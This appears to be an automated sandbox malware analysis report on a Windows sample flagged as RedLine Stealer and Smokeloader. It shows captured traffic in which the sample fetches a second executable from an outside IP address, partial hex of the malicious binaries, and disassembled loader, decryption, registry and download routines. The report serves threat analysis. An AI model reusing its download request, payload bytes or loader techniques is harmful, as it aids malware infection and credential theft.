Dec 20, 2024 16:33:05.863964081 CET	1236	IN	Data Raw: 00 04 6f 9a 00 00 0a 1b 58 28 01 01 00 0a 02 28 b0 01 00 06 2a b2 02 28 ca 01 00 06 2c 12 02 7b cc 00 00 04 02 7b c2 00 00 04 6f 6f 00 00 0a 2a 02 7b cc 00 00 04 02 28 a9 01 00 06 6f 6f 00 00 0a 2a 1e 02 7b c4 00 00 04 2a 1e 02 7b c5 00 00 04 2a Data Ascii: oX(((,{{oo{(oo{{J{oooJ{oxo{o((,{orp6{o2{o\|6{o}v{o~}{o~*6{o
Dec 20, 2024 16:33:05.863976955 CET	1236	IN	Data Raw: 00 00 04 6f 77 00 00 0a 2a ba 02 7b f9 00 00 04 03 6f 79 00 00 0a 02 7b f9 00 00 04 02 7b f9 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a 32 02 7b fa 00 00 04 6f bd 00 00 0a 2a 36 02 7b fa 00 00 04 03 6f c1 00 00 0a Data Ascii: ow{oy{{owox(+oy2{o6{oJ{oooz,{,{o/(zB#su(vB{(L{:}(M{*}o,o(N(+}(M
Dec 20, 2024 16:33:05.863991022 CET	1236	IN	Data Raw: 02 7b 23 01 00 04 03 6f 6f 00 00 0a 02 7b 24 01 00 04 02 7b 23 01 00 04 6f f2 00 00 0a 6f 6f 00 00 0a 2a 32 02 7b 23 01 00 04 6f f2 00 00 0a 2a aa 02 03 7d 1f 01 00 04 02 7b 22 01 00 04 02 7b 1f 01 00 04 28 29 00 00 06 02 7b 23 01 00 04 02 7b 1f Data Ascii: {#oo{${#ooo2{#o}{"{(){#{(){6{"oo2{"oz,{!,{!o/(znd}%(r((2{&f}({+{((){(*f}){,{
Dec 20, 2024 16:33:05.864682913 CET	1236	IN	Data Raw: 03 00 06 2a 1e 02 7b 54 01 00 04 2a 96 02 03 7d 54 01 00 04 02 7b 56 01 00 04 02 7b 54 01 00 04 28 29 00 00 06 02 02 7b 54 01 00 04 28 29 00 00 06 2a f6 02 7b 56 01 00 04 02 28 99 00 00 0a 02 7b 52 01 00 04 5a 02 7b 53 01 00 04 5b 6f d6 00 00 0a Data Ascii: {T}T{V{T(){T(){V({RZ{S[o{V{T(){T()2{Vo6{Voo{R{Sz,{U,{Uo/(zR}Y((?n}Y(o(?*"}W
Dec 20, 2024 16:33:05.983184099 CET	1236	IN	Data Raw: 01 00 0a 7d a5 01 00 04 02 73 fb 01 00 0a 7d a6 01 00 04 02 28 18 01 00 0a 02 6f a8 03 00 06 2a d6 02 73 fa 01 00 0a 7d 94 01 00 04 02 73 fa 01 00 0a 7d a5 01 00 04 02 73 fb 01 00 0a 7d a6 01 00 04 02 28 18 01 00 0a 03 02 6f 19 01 00 0a 02 6f a8 Data Ascii: }s}(os}s}s}(ooss}{o{rpo{o{os}{o(j,3os*os{"}F(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49881	185.156.73.23	80	6260	C:\Users\user\Desktop\7JKssbjRDa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:33:06.842843056 CET	394	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: s Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:33:08.418528080 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:33:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU ((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(tN(((0f(8Mo9:oo-
Dec 20, 2024 16:33:08.418612003 CET	224	IN	Data Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04 Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r
Dec 20, 2024 16:33:08.418623924 CET	1236	IN	Data Raw: 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 13 00 00 04 11 05 1f 64 6a 5a 11 04 5b 28 22 00 00 0a 6f 23 00 00 0a 06 17 58 0a 08 17 58 0c 08 07 8e 69 3f aa Data Ascii: /p%(%r3p%(( o!{djZ[("o#XXi?0t<%r7p%r;p%rAp%rGp%rMpl+l#@[X j[i/ j/rSp?($(%Js(&&(%
Dec 20, 2024 16:33:08.418834925 CET	1236	IN	Data Raw: 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 17 00 00 04 17 6f 5b 00 00 0a 02 7b 17 00 00 04 23 00 00 00 00 00 80 56 40 6f 5c 00 00 0a 02 7b 17 00 00 04 16 6f 5d 00 00 0a 02 7b 17 00 00 04 1f 09 20 0c 01 00 00 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 17 00 Data Ascii: oZ{o[{#V@o\{o]{ s>o?{s@oA{rpoB{(<o^{(_o`{(aob{oc{ AUsCoD{oE{rpo!{od{
Dec 20, 2024 16:33:08.418845892 CET	448	IN	Data Raw: 00 04 14 6f 56 00 00 0a 02 7b 09 00 00 04 16 6f 57 00 00 0a 02 7b 09 00 00 04 16 6f 58 00 00 0a 02 7b 09 00 00 04 17 6f 59 00 00 0a 02 7b 09 00 00 04 23 00 00 00 00 00 00 00 00 6f 5a 00 00 0a 02 7b 09 00 00 04 17 6f 5b 00 00 0a 02 7b 09 00 00 04 Data Ascii: oV{oW{oX{oY{#oZ{o[{#V@o\{o]{ s>o?{s@oA{rpoB{(<o^{(_o`{(aob{oc{ AasC
Dec 20, 2024 16:33:08.418858051 CET	1236	IN	Data Raw: 0a 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 0a 00 00 04 72 35 02 00 70 22 00 00 04 41 16 19 16 73 4f 00 00 0a 6f 50 00 00 0a 02 7b 0a 00 00 04 28 3c 00 00 0a 6f 51 00 00 0a 02 7b 0a 00 00 04 06 72 eb 03 00 70 6f 52 00 00 0a 74 50 00 00 01 6f Data Ascii: (MoN{r5p"AsOoP{(<oQ{rpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o[{#V@o\{o]{^s>o?{
Dec 20, 2024 16:33:08.418869972 CET	1236	IN	Data Raw: 6f 74 00 00 0a 02 7b 12 00 00 04 20 5e 01 00 00 1f 1d 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 12 00 00 04 1c 1e 1c 1e 73 40 00 00 0a 6f 41 00 00 0a 02 7b 12 00 00 04 1f 64 6f 75 00 00 0a 02 7b 12 00 00 04 72 47 05 00 70 6f 42 00 00 0a 02 7b 12 00 00 Data Ascii: ot{ ^s>o?{s@oA{dou{rGpoB{(vow{ g4sCoD{oE{o#{oi{r5p"dAsOoP{s>o?{s@oA{rmpoB{
Dec 20, 2024 16:33:08.419322014 CET	448	IN	Data Raw: 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 19 00 00 04 72 67 06 00 70 6f 42 00 00 0a 02 7b 19 00 00 04 20 de 03 00 00 20 ba 02 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 19 00 00 04 1f 11 6f 45 00 00 0a 02 7b 15 00 00 04 17 6f 7c 00 00 0a Data Ascii: s@oA{rgpoB{ sCoD{oE{o\|{o}{(~o{(ao{(~o{(o9{rupoRtPo{rpo{(KoL{r5p"\|AsOo
Dec 20, 2024 16:33:08.419333935 CET	1236	IN	Data Raw: 00 00 0a 02 7b 15 00 00 04 02 fe 06 18 00 00 06 73 67 00 00 0a 6f 8b 00 00 0a 02 7b 1a 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 1a 00 00 04 19 6f 48 00 00 0a 02 7b 1a 00 00 04 06 72 ef 06 00 70 6f 52 00 00 0a 74 50 00 00 01 6f 6d 00 00 0a 02 Data Ascii: {sgo{(<o9{oH{rpoRtPom{on{ s>o?{s@oA{r!poB{ % sCoD{oo{op{oq{or{sg
Dec 20, 2024 16:33:08.419344902 CET	1236	IN	Data Raw: 16 73 40 00 00 0a 6f 41 00 00 0a 02 7b 1e 00 00 04 72 77 04 00 70 6f 42 00 00 0a 02 7b 1e 00 00 04 20 81 00 00 00 1f 23 73 43 00 00 0a 6f 44 00 00 0a 02 7b 1e 00 00 04 19 6f 45 00 00 0a 02 7b 1e 00 00 04 72 9d 04 00 70 6f 21 00 00 0a 02 7b 1f 00 Data Ascii: s@oA{rwpoB{ #sCoD{oE{rpo!{(<o9{oH{(KoL{rpoRtPom{on{ qs>o?{s@oA{rpoB{Q?sCoD{
Dec 20, 2024 16:33:08.538126945 CET	1236	IN	Data Raw: 0a 02 7b 27 00 00 04 72 1d 02 00 70 6f 21 00 00 0a 02 7b 27 00 00 04 1f 10 6f 64 00 00 0a 02 7b 27 00 00 04 28 61 00 00 0a 6f 65 00 00 0a 02 7b 27 00 00 04 72 35 02 00 70 22 00 00 40 41 16 19 16 73 4f 00 00 0a 6f 66 00 00 0a 02 7b 27 00 00 04 02 Data Ascii: {'rpo!{'od{'(aoe{'r5p"@AsOof{''sgoh{#(FoG{#(<o9{#oH{#oI{#rpoJ{#(KoL{#(MoN{#r5p"AsOoP{#(<o

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 7JKssbjRDa.exePID: 6260, Parent PID: 4004

General

Target ID:	0
Start time:	10:31:57
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\7JKssbjRDa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7JKssbjRDa.exe"
Imagebase:	0x400000
File size:	1'969'664 bytes
MD5 hash:	838F2A05F5D5D176EF23390B574DF27E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3029432570.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5748, Parent PID: 6260

General

Target ID:	8
Start time:	10:33:11
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 488
Imagebase:	0x9c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 7JKssbjRDa.exePID: 6260, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	20.6%
Signature Coverage:	11.7%
Total number of Nodes:	1091
Total number of Limit Nodes:	26

Executed Functions

Function 00402C70 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 504
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32(0000000D), ref: 00402C96
SetLastError.KERNEL32(000000C1), ref: 00402CD8

Strings

Section alignment invalid!, xrefs: 00402D5C
ERROR_OUTOFMEMORY!, xrefs: 00402DEF
alignedImageSize != AlignValueUp!, xrefs: 00402DB9
@, xrefs: 00402C8F
DOS header size is not valid!, xrefs: 00402D09
FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
Size is not valid!, xrefs: 00402C9C
Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
DOS header is not valid!, xrefs: 00402CC6

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLast
String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
API String ID: 1452528299-393758929
Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98

Function 004034C0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,A132FD4D), ref: 00403540
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
_mbstowcs.LIBCMT ref: 004035B7
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
GetLastError.KERNEL32 ref: 004035D8
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
GetLastError.KERNEL32 ref: 0040360A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
CryptDestroyKey.ADVAPI32(?), ref: 0040374E

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3642901890-63410773
Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55

Function 00402950 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
LocalFree.KERNEL32(00000000), ref: 00402A62
LocalFree.KERNEL32(?), ref: 00402A67

Strings

%s: %s, xrefs: 00402A46
Error protecting memory page, xrefs: 00402A41

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
String ID: %s: %s$Error protecting memory page
API String ID: 839691724-1484484497
Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88

Function 00401880 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924

Strings

text, xrefs: 00401B5C

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: FileInternet$PointerRead
String ID: text
API String ID: 3197321146-999008199
Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54

Function 0040EF0D Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,7622DF80,?,00000000,?,004114AD), ref: 0040EF2F
TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,7622DF80,?,00000000,?,004114AD), ref: 0040EF36
ExitProcess.KERNEL32 ref: 0040EF48

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58

Function 00F4B1D6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00F4B1FE
Module32First.KERNEL32(00000000,00000224), ref: 00F4B21E

Memory Dump Source

Source File: 00000000.00000002.3029432570.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 35650cc763dba1fa733eae9cbcc189394752096f8731c34eb1c31da2dd771766
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 74F0C2316003106FD7213AB5A88CA6E7AE8EF89331F100128EA42D10C1DBB4ED069661

Function 00408020 Relevance: 2.5, Strings: 2, Instructions: 27COMMON

Download Yara Rule

Strings

emp, xrefs: 00408037
mixtwo, xrefs: 0040805C

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: Sleep
String ID: emp$mixtwo
API String ID: 3472027048-2390925073
Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA

Function 004055C0 Relevance: 27.3, APIs: 5, Strings: 10, Instructions: 1092
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,?,7712D120), ref: 00405620
__Init_thread_footer.LIBCMT ref: 00405847
Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A

Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9

Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A

Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99

Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09

Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D

Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD

Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9

Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79

Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11

Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6

Strings

get, xrefs: 0040575C
SUB=, xrefs: 00405632
Q)9, xrefs: 004056F8
mixone, xrefs: 00405ADF
^OX*, xrefs: 004046E8
]DFE, xrefs: 0040428D
viFO, xrefs: 00404537
KDOX, xrefs: 00404541
DFEK, xrefs: 00404EDC
updateSW, xrefs: 004051E8

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
API String ID: 2078494684-1136066708
Opcode ID: 6cc127e7e3ac2c726d6a27f0abac17a1d82dad36900cdcac998fe1a0d29d4f20
Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
Opcode Fuzzy Hash: 6cc127e7e3ac2c726d6a27f0abac17a1d82dad36900cdcac998fe1a0d29d4f20
Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9

Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000152A
__cftof.LIBCMT ref: 10001624
InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
InternetCloseHandle.WININET(00000000), ref: 100016E0
InternetCloseHandle.WININET(00000000), ref: 100016E3
InternetCloseHandle.WININET(00000000), ref: 100016E9

Strings

GET, xrefs: 100016AA
http://, xrefs: 10001567

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
String ID: GET$http://
API String ID: 1233269984-1632879366
Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

Function 00401740 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD

Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829

Strings

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
text, xrefs: 00401B5C
GET, xrefs: 00401F81

Memory Dump Source

